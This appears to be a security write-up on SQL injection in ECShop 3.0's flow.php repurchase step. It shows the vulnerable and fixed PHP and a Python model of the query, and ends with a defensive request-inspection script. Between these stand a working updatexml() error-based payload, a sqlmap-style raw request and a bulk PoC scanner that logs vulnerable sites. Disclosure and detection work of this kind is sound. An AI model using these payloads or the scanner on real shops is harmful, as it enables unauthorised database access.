ECShop flow.php injection: ECShop 3.0 flow.php SQL injection vulnerability | CN-SEC 中文网

Summary

This vulnerability has been fixed in the new version; I only found it by downloading an ancient version and comparing the two. I just never imagined ECShop would make such a low-level mistake.

Alright, the file flow.php:

```php
elseif ($_REQUEST['step'] == 'repurchase')
{
    include_once('includes/cls_json.php');

    // strip_tags() only removes HTML tags; nothing here checks that the value is a number
    $order_id = strip_tags($_POST['order_id']);
    $order_id = json_str_iconv($order_id);
    $user_id  = $_SESSION['user_id'];

    $json = new JSON;

    // $order_id is concatenated into the statement unquoted: the injection point
    $order = $db->getOne('SELECT count(*) FROM ' . $ecs->table('order_info') . ' WHERE order_id = ' . $order_id . ' and user_id = ' . $user_id);
    if (!$order)
    {
        $result = array('error' => 1, 'message' => $_LANG['repurchase_fail']);
        die($json->encode($result));
    }

    $db->query('DELETE FROM ' . $ecs->table('cart') . " WHERE rec_type = " . CART_REPURCHASE);

    $order_goods = $db->getAll("SELECT goods_id, goods_number, goods_attr_id, parent_id FROM " . $ecs->table('order_goods') . " WHERE order_id = " . $order_id);

    $result = array('error' => 0, 'message' => '');
    foreach ($order_goods as $goods)
    {
        $spec = empty($goods['goods_attr_id']) ? array() : explode(',', $goods['goods_attr_id']);
        if (!addto_cart($goods['goods_id'], $goods['goods_number'], $spec, $goods['parent_id'], CART_REPURCHASE))
        {
            $result = false;
            $result = array('error' => 1, 'message' => $_LANG['repurchase_fail']);
        }
    }

    die($json->encode($result));
}
```

Here the parameter is not passed through `intval()` as it is in the new version, where the line reads `$order_id = intval($_POST['order_id']);`. The fixed branch looks like this:

```php
elseif ($_REQUEST['step'] == 'repurchase')
{
    include_once('includes/cls_json.php');

    // intval() forces an integer; the rest of the branch is unchanged
    $order_id = intval($_POST['order_id']);
    $order_id = json_str_iconv($order_id);
    $user_id  = $_SESSION['user_id'];

    $json = new JSON;

    $order = $db->getOne('SELECT count(*) FROM ' . $ecs->table('order_info') . ' WHERE order_id = ' . $order_id . ' and user_id = ' . $user_id);
    if (!$order)
    {
        $result = array('error' => 1, 'message' => $_LANG['repurchase_fail']);
        die($json->encode($result));
    }

    $db->query('DELETE FROM ' . $ecs->table('cart') . " WHERE rec_type = " . CART_REPURCHASE);

    $order_goods = $db->getAll("SELECT goods_id, goods_number, goods_attr_id, parent_id FROM " . $ecs->table('order_goods') . " WHERE order_id = " . $order_id);

    $result = array('error' => 0, 'message' => '');
    foreach ($order_goods as $goods)
    {
        $spec = empty($goods['goods_attr_id']) ? array() : explode(',', $goods['goods_attr_id']);
        if (!addto_cart($goods['goods_id'], $goods['goods_number'], $spec, $goods['parent_id'], CART_REPURCHASE))
        {
            $result = false;
            $result = array('error' => 1, 'message' => $_LANG['repurchase_fail']);
        }
    }

    die($json->encode($result));
}
```

Now look at json_str_iconv:

```php
function json_str_iconv($str)
{
    if (EC_CHARSET != 'utf-8')
    {
        if (is_string($str))
        {
            return addslashes(stripslashes(ecs_iconv('utf-8', EC_CHARSET, $str)));
        }
        elseif (is_array($str))
        {
            foreach ($str as $key => $value)
            {
                $str[$key] = json_str_iconv($value);
            }
            return $str;
        }
        elseif (is_object($str))
        {
            foreach ($str as $key => $value)
            {
                $str->$key = json_str_iconv($value);
            }
            return $str;
        }
        else
        {
            return $str;
        }
    }
    return $str;
}
```

Clearly there is no filtering here. Look at the SQL statement above again: `$order_id` is not even wrapped in single quotes, so it can be injected directly. Note that `json_str_iconv()` only calls `addslashes()` when `EC_CHARSET` is not utf-8, and `addslashes()` escapes nothing but quotes, backslashes and NUL bytes. Because the value is concatenated into the query unquoted, a payload made of digits, keywords and parentheses needs no quote characters at all and passes through both branches untouched; only the `intval()` in the fixed version reduces it to a number.
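To make the two code paths concrete, here is an added example (not ECShop code and not from the original post): a Python model of the PHP built-ins involved, `strip_tags()`, `addslashes()`, `stripslashes()` and `intval()`, reduced to the behaviour that matters for an ASCII payload, with `ecs_iconv()` left out because converting an ASCII string between charsets changes nothing. It builds the exact `WHERE` clause each version of `flow.php` would send for the payload used later in this post, for both the utf-8 and the non-utf-8 branch of `json_str_iconv()`. The table name `ecs_order_info` and a `user_id` of 0 are assumptions for illustration.

```python
import re

# The payload from the write-up, as it arrives in $_POST['order_id']
PAYLOAD = "1 or updatexml(1,concat(0x7e,(user())),0) or 11#"


def php_strip_tags(s: str) -> str:
    """Simplified PHP strip_tags(): remove anything shaped like an HTML/PHP tag.
    The payload contains no '<', so this is a no-op for it."""
    return re.sub(r"<[^>]*>", "", s)


def php_addslashes(s: str) -> str:
    """PHP addslashes(): backslash-escape ' \" \\ and NUL only.
    Spaces, parentheses and SQL keywords pass through untouched."""
    return (s.replace("\\", "\\\\").replace("'", "\\'")
             .replace('"', '\\"').replace("\x00", "\\0"))


def php_stripslashes(s: str) -> str:
    """PHP stripslashes(): undo addslashes() (\\0 turns back into a NUL byte)."""
    return re.sub(r"\\(.)", lambda m: "\x00" if m.group(1) == "0" else m.group(1), s)


def php_intval(v) -> int:
    """PHP intval() on a string: optional leading whitespace and sign, then digits;
    a string that does not start that way gives 0. '1 or ...' therefore becomes 1."""
    if isinstance(v, int):
        return v
    m = re.match(r"\s*([+-]?\d+)", str(v))
    return int(m.group(1)) if m else 0


def json_str_iconv(v, ec_charset="utf-8"):
    """ECShop's json_str_iconv() for the scalar case: it only touches strings, and
    only when the site charset is not utf-8, where it runs addslashes(stripslashes()).
    ecs_iconv() is omitted (assumption: ASCII input, so conversion is a no-op)."""
    if ec_charset != "utf-8" and isinstance(v, str):
        return php_addslashes(php_stripslashes(v))
    return v


def build_query(order_id, user_id=0) -> str:
    """The statement flow.php sends: order_id is concatenated without quotes.
    Table name and user_id are assumed for illustration."""
    return (f"SELECT count(*) FROM ecs_order_info "
            f"WHERE order_id = {order_id} and user_id = {user_id}")


def old_repurchase_query(post_order_id: str, ec_charset="utf-8") -> str:
    """Vulnerable path: strip_tags() then json_str_iconv(), no type check."""
    return build_query(json_str_iconv(php_strip_tags(post_order_id), ec_charset))


def new_repurchase_query(post_order_id: str, ec_charset="utf-8") -> str:
    """Fixed path: intval() first, so json_str_iconv() sees an int and the
    query can only ever contain a single integer."""
    return build_query(json_str_iconv(php_intval(post_order_id), ec_charset))


def order_id_expr(query: str) -> str:
    """Pull out whatever ended up between 'order_id = ' and ' and user_id'."""
    return re.search(r"order_id = (.*?) and user_id = ", query).group(1)


if __name__ == "__main__":
    for charset in ("utf-8", "gbk"):
        print(f"[{charset}] old: {old_repurchase_query(PAYLOAD, charset)}")
        print(f"[{charset}] new: {new_repurchase_query(PAYLOAD, charset)}")
```

Running it shows the old path emitting `WHERE order_id = 1 or updatexml(...) or 11# and user_id = 0` under both charsets, while the new path emits `WHERE order_id = 1 and user_id = 0`; the `addslashes()` branch never gets a chance to matter because the payload contains nothing it would escape.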

POST the following body to http://localhost/flow.php?step=repurchase:

```
order_id=1 or updatexml(1,concat(0x7e,(user())),0) or 11#
```


A raw POST request (the trailing `*` after `order_id=1` marks the injection point, in the convention sqlmap uses for `-r` request files):

```http
POST /flow.php?step=repurchase HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: ECS[visit_times]=2; ECS_ID=1998571d464009d432a17951ee5852104eba8b75
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 11

order_id=1*
```

Attached, a PoC scanner found in the wild:

```python
#!/usr/bin/env python3
# PoC scanner for the ECShop flow.php?step=repurchase error-based injection.
# Usage: poc.py -u http://target   or   poc.py -r targets.txt
import argparse
import sys

import requests as req

# Text ECShop's MySQL class prints when a query fails; seeing it after the
# payload means the injected updatexml() call was evaluated by the server.
ERROR_MARK = 'MySQL server error report:Array'
# Value of the order_id form field (no quotes needed: the sink is unquoted)
PAYLOAD = '1 or updatexml(1,concat(0x7e,(user())),0) or 11#'


def poc(url):
    url = url + '/flow.php'
    try:
        rgg = req.get(url, timeout=10)
    except req.RequestException:
        return '[-]Getting ' + url + ' Wrong'
    if rgg.status_code != 200:
        return '[-]' + url + ' Wrong'
    geturl = url + '?step=repurchase'
    # Send order_id as a form field so PHP actually populates $_POST['order_id']
    a = req.post(geturl, data={'order_id': PAYLOAD}, timeout=10)
    if a.status_code != 200:
        return '[-]' + url + ' Fail!!'
    if ERROR_MARK in a.text:
        return 2
    return '[-]' + url + ' Exploiting Fail'


def ifhttp(url):
    if url.startswith('http://') or url.startswith('https://'):
        return url
    return 'http://' + url


def read_targets(filename):
    # One target per line; blank lines are skipped
    try:
        with open(filename) as fh:
            return [line.strip() for line in fh if line.strip()]
    except OSError:
        print('[-] The file does not exist')
        sys.exit(0)


def save_result(url):
    with open('Res.txt', 'a+') as fh:
        fh.write(url + '\n')


def check(target):
    target = ifhttp(target.rstrip('/'))
    r = poc(target)
    if r == 2:
        print('[+]' + target + ' succeed')
        save_result(target)
    else:
        print(r)


if __name__ == '__main__':
    parser = argparse.ArgumentParser(usage='%(prog)s -u URL | -r FILE')
    parser.add_argument('-u', dest='url', help='the website')
    parser.add_argument('-r', dest='file', help='the file')
    options = parser.parse_args()
    if options.url is None and options.file is None:
        parser.print_usage()
        sys.exit(0)
    if options.url is not None:
        check(options.url)
    if options.file is not None:
        for line in read_targets(options.file):
            check(line)
```
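On the defensive side, here is an added example (not part of the original post) that turns the request shown above into a detection check: it parses raw HTTP requests, picks out POSTs to `flow.php?step=repurchase`, URL-decodes `order_id`, and flags anything that is not a plain integer, separating values that carry the error-based and boolean-based MySQL functions and keywords seen in this class of payload from other non-numeric values such as a sqlmap `*` marker. The sample requests are constructed for the example, not captured traffic, and the keyword list is the author's own choice.

```python
import re
from urllib.parse import parse_qs, urlsplit

# order_id is an integer key; anything else should never reach the query.
INT_ONLY = re.compile(r"\s*[+-]?\d+\s*")
# Functions and keywords typical of error-based / boolean-based MySQL injection
# (assumed list for this example, extend as needed).
SQLI_MARKERS = re.compile(
    r"\b(updatexml|extractvalue|sleep|benchmark|load_file)\s*\("
    r"|\b(union|select|or|and)\b",
    re.IGNORECASE,
)


def make_post(target: str, body: str) -> str:
    """Build a constructed raw HTTP/1.1 POST (sample data, not captured traffic)."""
    return (f"POST {target} HTTP/1.1\r\nHost: 127.0.0.1\r\n"
            f"Content-Type: application/x-www-form-urlencoded\r\n"
            f"Content-Length: {len(body)}\r\n\r\n{body}")


def parse_request(raw: str):
    """Split a raw request into (method, target, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers, body


def inspect(raw: str):
    """Return a verdict dict for POST /flow.php?step=repurchase, else None."""
    method, target, headers, body = parse_request(raw)
    url = urlsplit(target)
    if method != "POST" or not url.path.endswith("/flow.php"):
        return None
    if parse_qs(url.query).get("step", [""])[0] != "repurchase":
        return None
    form = parse_qs(body, keep_blank_values=True)
    # parse_qs already URL-decodes ('+' -> space, '%23' -> '#', ...)
    order_id = form.get("order_id", [""])[0]
    if INT_ONLY.fullmatch(order_id):
        verdict, reason = "clean", "integer order_id"
    elif SQLI_MARKERS.search(order_id):
        verdict, reason = "sqli", "SQL function or keyword inside order_id"
    else:
        verdict, reason = "suspicious", "non-integer order_id"
    return {"order_id": order_id, "verdict": verdict, "reason": reason}


def scan(requests):
    """Run inspect() over raw requests and keep only the ones that apply."""
    return [r for r in (inspect(raw) for raw in requests) if r is not None]


# Constructed samples: a normal repurchase, the write-up's payload form-encoded,
# a sqlmap-style request body with the '*' marker, and an unrelated request.
SAMPLES = [
    make_post("/flow.php?step=repurchase", "order_id=42"),
    make_post("/flow.php?step=repurchase",
              "order_id=1+or+updatexml(1%2Cconcat(0x7e%2C(user()))%2C0)+or+11%23"),
    make_post("/flow.php?step=repurchase", "order_id=1*"),
    "GET /index.php HTTP/1.1\r\nHost: 127.0.0.1\r\n\r\n",
]

if __name__ == "__main__":
    for hit in scan(SAMPLES):
        print(f"{hit['verdict']:<10} {hit['reason']:<42} order_id={hit['order_id']!r}")
```

The integer check alone is what a WAF rule or log query for this endpoint needs; the keyword match only adds a label so that a confirmed payload is triaged ahead of a stray non-numeric value.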
